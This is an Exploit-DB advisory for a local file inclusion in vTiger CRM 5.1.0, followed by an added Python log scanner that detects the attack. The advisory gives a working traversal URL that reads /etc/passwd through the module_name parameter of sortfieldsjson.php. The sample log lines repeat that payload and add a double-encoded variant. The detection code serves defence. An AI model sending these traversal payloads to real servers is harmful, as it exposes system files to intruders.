vTiger CRM 5.1.0 – Local File Inclusion

  • Author: Pi3rrot
    Date: 2012-04-22
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/18770/
  • # Exploit Title: VTiger CRM
    # Google Dork: None
    # Date: 20/03/2012
    # Author: Pi3rrot
    # Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
    # Version: 5.1.0
    # Tested on: CentOS 6
    # CVE : none
    
    We found this vulnerability in VTiger 5.1.0.
    In this example, you can see a Local File Inclusion in the file sortfieldsjson.php.
    
    Try this:
    https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
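
A log check for the request pattern described above, as an added example that is not part of the original advisory: it flags requests to sortfieldsjson.php whose module_name is not a plain identifier after percent-decoding. The identifier allowlist and the combined access log format are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter named in the advisory.
ENDPOINT = "/modules/com_vtiger_workflow/sortfieldsjson.php"
PARAM = "module_name"
# Assumption: a legitimate module name is a plain identifier.
SAFE_NAME = re.compile(r"[A-Za-z0-9_]+")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
BASE = "/vtigercrm" + ENDPOINT
SAMPLE_LOG = [
    f'203.0.113.5 - - [22/Apr/2012:10:00:00 +0000] "GET {BASE}?module_name=Accounts HTTP/1.1" 200 512',
    f'203.0.113.9 - - [22/Apr/2012:10:00:05 +0000] "GET {BASE}?module_name=../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    f'203.0.113.9 - - [22/Apr/2012:10:00:09 +0000] "GET {BASE}?module_name=%252e%252e%252fetc%252fpasswd%2500 HTTP/1.1" 200 0',
    '203.0.113.7 - - [22/Apr/2012:10:01:00 +0000] "GET /vtigercrm/index.php?module_name=../x HTTP/1.1" 200 90',
]


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252e -> %2e -> .)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_values(log_line):
    """Return decoded module_name values that are not plain identifiers."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith(ENDPOINT):
        return []
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
    decoded = [fully_decode(v) for v in values]
    return [v for v in decoded if not SAFE_NAME.fullmatch(v)]


def scan(lines):
    """Return (line_number, flagged_values) for each line with a hit."""
    hits = ((n, suspicious_values(line)) for n, line in enumerate(lines, 1))
    return [(n, vals) for n, vals in hits if vals]
```

The same allowlist, applied to module_name before it reaches any file path, is the corresponding server-side control.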